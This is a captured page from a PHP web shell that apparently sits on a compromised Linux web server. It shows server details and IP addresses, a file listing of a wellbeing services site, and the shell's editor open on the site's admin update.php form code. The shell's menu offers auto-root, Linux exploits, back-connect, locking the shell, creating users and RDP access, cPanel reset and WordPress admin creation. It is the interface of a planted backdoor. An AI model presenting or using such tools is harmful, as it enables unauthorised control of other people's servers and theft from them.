Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 13.59.80.251
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
auswellbeing /
[ HOME SHELL ]
Name
Size
Permission
Action
auswellbeing
[ DIR ]
drwxr-xr-x
config.ini
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
old
[ DIR ]
drwxr-xr-x
about.php
3.54
KB
-rw-r--r--
adjustment_support.php
48
B
-rw-r--r--
blog.php
2.65
KB
-rw-r--r--
check.php
718
B
-rw-r--r--
counselling_for_carers.php
48
B
-rw-r--r--
create.php
7.88
KB
-rw-r--r--
delete.php
1.42
KB
-rw-r--r--
front.check.login.php
740
B
-rw-r--r--
index.php
9.44
KB
-rw-r--r--
mindfulness_practice.php
48
B
-rw-r--r--
multilingual.php
48
B
-rw-r--r--
personal_development.php
48
B
-rw-r--r--
post.php
3.53
KB
-rw-r--r--
process.php
3.47
KB
-rw-r--r--
process_new.php
3.14
KB
-rw-r--r--
process_seo.php
1
KB
-rw-r--r--
relationship_skills.php
48
B
-rw-r--r--
service-data-template.php
2.57
KB
-rw-r--r--
service-data.php
1.45
KB
-rw-r--r--
services.php
3.47
KB
-rw-r--r--
update.php
10.89
KB
-rw-r--r--
upload.image.php
540
B
-rw-r--r--
upload.image.sm.php
561
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : update.php
<?php require_once "config.ini/login.check.php"; include( "includes/header.php");?> <?php $tb = $ref = $type = $id = ''; if(isset($_GET['tb'])) { if(!empty($_GET['tb'])) { $tb = $tool->ed($_GET['tb'], 'd'); } } if(isset($_GET['ref'])) { if(!empty($_GET['ref'])) { $ref = $tool->cleanInputVal($_GET['ref']); } } if(isset($_GET['type'])) { if(!empty($_GET['type'])) { $type = $tool->cleanInputVal($_GET['type']); } } if(isset($_GET['id'])) { if(!empty($_GET['id'])) { $id = $tool->cleanInputVal($_GET['id']); } } ?> <div class="container-fluid" style="background-color:#fcf7f1;"> <div class="container"> <form action="process.php" method="post" class="form" enctype="multipart/form-data"> <?php if($type == 'slider'){ ?> <h2 class="text-center form_heading bg-primary"> Update Slider (<?=getitem($db, $tb, $id)[0] ?>) </h2> <div class="form-group row"> <label for="heading" class="col-md-4 lead pt-2" style="top:10px;">Heading</label> <input type="text" class="col-md-8" id="heading" name="heading" value="<?=getitem($db, $tb, $id)[2] ?>" placeholder="Write here..."> </div> <div class="form-group row"> <div class="col-md-4" id="uploaded_image"> </div> <div class="col-md-8 text-center" style="position:relative;"> <img src="<?=baseurl.'/'.getitem($db, $tb, $id)[1] ?>" id="demoImage" class="img-fluid w-25"> </div> </div> <div class="form-group row"> <label for="photo" class="col-md-4 lead pt-2" style="top:10px;">Select Image</label> <input type="file" class="col-md-8 file-control" id="photo" name="photo" /> <input type="hidden" class="col-md-12" id="imagePath" name="path" value="<?=getitem($db, $tb, $id)[1] ?>"> </div> <?php } else if($type == 'title'){ ?> <h2 class="text-center form_heading bg-primary"> Update Title </h2> <div class="form-group row"> <label for="heading" class="col-md-4 lead pt-2" style="top:10px;">Content Title</label> <input type="text" class="col-md-8" id="title" name="title" value="<?=getitem($db, $tb, $id)[3] ?>" placeholder="Write here..."> </div> <?php } else if($type == 'content'){ ?> <h2 class="text-center form_heading bg-primary"> Update Content </h2> <div class="form-group row"> <!-- <label for="heading" class="col-md-12 lead pb-2" style="bottom:10px;">Content</label> --> <textarea class="col-md-12 editor" id="content" name="content" placeholder="Write here..."><?=getitem($db, $tb, $id)[3] ?></textarea> </div> <?php } else if($type == 'photo'){ ?> <h2 class="text-center form_heading bg-primary"> Update Image </h2> <div class="form-group row"> <div class="col-md-12" id="uploaded_image"> </div> <div class="col-md-12 text-center" style="position:relative;"> <img src="<?=baseurl.'/'.getitem($db, $tb, $id)[3] ?>" id="demoImage" class="img-fluid w-25"> </div> </div> <div class="form-group row"> <label for="photo" class="col-md-4 lead pt-2" style="top:10px;">Select Image</label> <input type="file" class="col-md-8 file-control" id="photo" name="photo" /> <input type="hidden" class="col-md-12" id="imagePath" name="path" value="<?=getitem($db, $tb, $id)[3] ?>"> </div> <?php } else if($type == 'services'){ ?> <h2 class="text-center form_heading bg-info" style="color:#444;"> Update Service (<?=getitem($db, $tb, $id)[2] ?>) </h2> <div class="form-group row"> <label for="heading" class="col-md-4 lead pt-2" style="top:10px;">Heading</label> <input type="text" class="col-md-8" id="heading" name="heading" value="<?=getitem($db, $tb, $id)[2] ?>" placeholder="Write here..."> </div> <div class="form-group row"> <div class="col-md-4" id="uploaded_image_sm"> </div> <div class="col-md-8 text-center" style="position:relative;"> <img src="<?=baseurl.'/'.getitem($db, $tb, $id)[3] ?>" id="demoImage_sm" class="img-fluid w-25"> </div> </div> <div class="form-group row"> <label for="photo_sm" class="col-md-4 lead pt-2" style="top:10px;">Select Image(Small)</label> <input type="file" class="col-md-8 file-control" id="photo_sm" name="photo_sm" /> <input type="hidden" class="col-md-12" id="imagePath_sm" name="path_sm" value="<?=getitem($db, $tb, $id)[3] ?>"> </div> <div class="form-group row"> <div class="col-md-4" id="uploaded_image"> </div> <div class="col-md-8 text-center" style="position:relative;"> <img src="<?=baseurl.'/'.getitem($db, $tb, $id)[4] ?>" id="demoImage" class="img-fluid w-25"> </div> </div> <div class="form-group row"> <label for="photo" class="col-md-4 lead pt-2" style="top:10px;">Select Image(Large)</label> <input type="file" class="col-md-8 file-control" id="photo" name="photo" /> <input type="hidden" class="col-md-12" id="imagePath" name="path" value="<?=getitem($db, $tb, $id)[4] ?>"> <input type="hidden" class="col-md-12" name="service_page_name" value="<?=getitem($db, $tb, $id)[1] ?>"> </div> <div class="form-group row"> <!-- <label for="heading" class="col-md-4 lead pt-2" style="top:10px;">Content</label> --> <textarea class="col-md-12 editor" id="content" name="content" placeholder="Write here..."><?=getitem($db, $tb, $id)[5] ?></textarea> </div> <hr> <h2 class="text-center form_heading bg-info" style="color:#444444;"> SEO / Meta Settings </h2> <div class="form-group row"> <label for="service_page_name" class="col-md-4 lead pt-2" style="top:10px;">Service Page Vanity URL</label> <input type="text" class="col-md-8" name="service_page_name" readonly id="service_page_name" placeholder="Write here..." value="<?=getitem($db, $tb, $id)[1] ?>"> </div> <div class="form-group row"> <label for="title" class="col-md-4 lead pt-2" style="top:10px;">SEO Title</label> <input type="text" class="col-md-8" name="title" id="title" placeholder="Write here..." value="<?=getitem($db, $tb, $id)[6] ?>"> </div> <div class="form-group row"> <label for="description" class="col-md-12 lead pb-2" >SEO Description</label> <textarea name="description" class="col-md-12 form-control" rows="5" id="description" placeholder="Write here..."><?=getitem($db, $tb, $id)[7] ?></textarea> </div> <div class="form-group row"> <label for="keywords" class="col-md-12 lead pb-2" >SEO Keywords</label> <textarea name="keywords" class="col-md-12 form-control" rows="5" id="keywords" placeholder="Write here..."><?=getitem($db, $tb, $id)[8] ?></textarea> </div> <?php } else if($type == 'blog'){ ?> <h2 class="text-center form_heading bg-info" style="color:#444444;"> Edit Post (<?=getitem($db, $tb, $id)[2] ?>) </h2> <div class="form-group row"> <label for="heading" class="col-md-4 lead pt-2" style="top:10px;">Post Heading</label> <input type="text" class="col-md-8" id="heading" name="heading" value="<?=getitem($db, $tb, $id)[2] ?>" placeholder="Write here..."> </div> <div class="form-group row"> <div class="col-md-4" id="uploaded_image"> </div> <div class="col-md-8 text-center" style="position:relative;"> <img src="<?=baseurl.'/'.getitem($db, $tb, $id)[4] ?>" id="demoImage" class="img-fluid w-25"> </div> </div> <div class="form-group row"> <label for="photo" class="col-md-4 lead pt-2" style="top:10px;">Post Image</label> <input type="file" class="col-md-8 file-control" id="photo" name="photo" /> <input type="hidden" class="col-md-12" id="imagePath" name="path" value="<?=getitem($db, $tb, $id)[4] ?>"> </div> <div class="form-group row"> <label for="post_short_summery" class="col-md-12 lead" style="top:10px;">Post Summary</label> <br><br> <textarea class="col-md-12 editor" id="post_short_summery" name="post_short_summery" placeholder="Write here..."><?=getitem($db, $tb, $id)[5] ?></textarea> </div> <div class="form-group row"> <label for="post_long_summery" class="col-md-12 lead" style="top:10px;">Post Content</label> <br><br> <textarea class="col-md-12 editor" id="post_long_summery" name="post_long_summery" placeholder="Write here..."><?=getitem($db, $tb, $id)[6] ?></textarea> </div> <h2 class="text-center form_heading bg-info" style="color:#444444;"> SEO / Meta Settings </h2> <div class="form-group row"> <label for="title" class="col-md-4 lead pt-2" style="top:10px;">SEO Title</label> <input type="text" class="col-md-8" name="title" id="title" placeholder="Write here..." value="<?=getitem($db, $tb, $id)[7] ?>"> </div> <div class="form-group row"> <label for="description" class="col-md-12 lead pb-2" >SEO Description</label> <textarea name="description" class="col-md-12 form-control" rows="5" id="description" placeholder="Write here..."><?=getitem($db, $tb, $id)[8] ?></textarea> </div> <div class="form-group row"> <label for="keywords" class="col-md-12 lead pb-2" >SEO Keywords</label> <textarea name="keywords" class="col-md-12 form-control" rows="5" id="keywords" placeholder="Write here..."><?=getitem($db, $tb, $id)[9] ?></textarea> </div> <?php } else if($type == 'gallery'){ ?> gallery <?php } ?> <!-- images/service-icons/relationship.png --> <div class="row"> <div class="col-md-4"></div> <div class="col-md-4"> <input type="hidden" name="action" value="update"> <input type="hidden" name="tb" value="<?=$tb ?>"> <input type="hidden" name="ref" value="<?=$ref ?>"> <input type="hidden" name="type" value="<?=$type ?>"> <input type="hidden" name="id" value="<?=$id ?>"> <button type="submit" class="btn btn-primary w-100 btn-block btn-lg"> <i class="fa fa-save"></i> Update </button> <div class="col-md-4"></div> </div> </div> </form> </div> </div> <?php include( "includes/footer.php");?>
Close